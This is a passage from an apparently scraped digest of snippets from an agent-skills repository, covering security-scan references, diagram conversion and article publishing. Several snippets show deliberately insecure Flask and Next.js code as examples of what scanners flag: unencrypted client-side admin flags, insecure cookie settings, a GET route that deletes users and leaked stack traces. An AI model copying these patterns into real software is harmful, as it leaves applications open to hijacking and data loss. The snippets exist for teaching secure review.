configurations, including client-side sessions without encryption and insecure cookie settings. These can lead to session hijacking and fixation. ```python # Client-side session without encryption session['user_id'] = user.id session['is_admin'] = True # User can modify! # Insecure session configuration app.config['SESSION_COOKIE_SECURE'] = False app.config['SESSION_COOKIE_HTTPONLY'] = False app.config['SESSION_COOKIE_SAMESITE'] = None ``` -------------------------------- ### Run Dependency Audit Script Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/SKILL.md Execute the provided script to audit project dependencies for known vulnerabilities. ```bash ./scripts/dependency-audit.sh ``` -------------------------------- ### Convert Tables and Diagrams to PNG Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md Use this script to convert markdown tables and mermaid diagrams to PNG images for compatibility with X Premium. Specify input markdown/mermaid file and output PNG path. ```bash # Tables → PNG (auto-detected as table) node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/table-1.md -o /tmp/table-1.png # Mermaid → PNG (auto-detected as mermaid) node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/diagram-1.mmd -o /tmp/diagram-1.png ``` -------------------------------- ### Mermaid Flowchart Conversion Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md Converts a Mermaid flowchart definition to a PNG image, saving it to a specified output path. This example demonstrates automatic filename generation based on content analysis. ```bash node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/diagram.mmd -o ./images/login-flow.png ``` -------------------------------- ### YAML Frontmatter with Straight Quotes Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/personal-writing-style/references/punctuation.md Use straight quotes (") for Markdown frontmatter (YAML syntax requirement), code blocks, and JSON/config files. This example shows YAML frontmatter. ```yaml # Frontmatter uses straight quotes --- title: "文章标题" tags: ["AI", "安全"] --- ``` -------------------------------- ### Update Plugin Skills List Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/CLAUDE.md Illustrates how to add a new skill to an existing plugin's configuration within the marketplace.json file. This involves adding the new skill's directory path to the 'skills' array. ```json "skills": [ "./skills/existing-skill", "./skills/new-skill" ] ``` -------------------------------- ### Manual Dependency Audit with npm Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/SKILL.md Perform a manual dependency audit using the npm command-line interface. Outputs results in JSON format. ```bash npm audit --json ``` -------------------------------- ### Vulnerable State-Changing Operations in Next.js Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/auth-vulnerabilities.md Shows insecure patterns for handling state changes, including forms that lack CSRF tokens and the use of GET requests for operations that modify data. ```typescript // ❌ VULNERABLE - Form without CSRF token (Pages Router)
``` ```typescript // ❌ VULNERABLE - State-changing GET request export async function GET(request: Request) { const userId = request.nextUrl.searchParams.get('id'); await db.user.delete({ where: { id: userId } }); } ``` -------------------------------- ### Wait for Media Upload Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md Use `textGone` with a short `time` value for efficient upload waiting. The `time` parameter specifies the maximum wait duration, not a fixed delay. ```bash # 1. Click the block element at block_index position browser_click on the element at position block_index in the editor # 2. Open Insert menu browser_click on "Insert" button (Add Media button) # 3. Click Divider menu item browser_click on "Divider" menuitem # Divider is inserted at cursor position ``` -------------------------------- ### Secure Flask Blueprints with Authentication Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md Implement authentication for Flask blueprints to restrict access to specific routes. This example shows how to create a decorator to ensure only admin users can access blueprint routes. ```python from functools import wraps from flask import session, abort def admin_required(f): @wraps(f) def decorated(*args, **kwargs): if not session.get('is_admin'): abort(403) return f(*args, **kwargs) return decorated # Apply to all routes in blueprint @admin_bp.before_request @admin_required def before_request(): pass # All routes in blueprint require admin # Or per-route @admin_bp.route('/users') @admin_required def list_users(): return jsonify(User.query.all()) ``` -------------------------------- ### Detect Verbose Error Handling in Production (TypeScript) Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/owasp-top-10.md Example of error handling that exposes internal details in a production environment. Avoid sending stack traces or sensitive error information to the client. ```typescript if (error) { res.status(500).json({ error: error.stack }); // Exposes internals } ```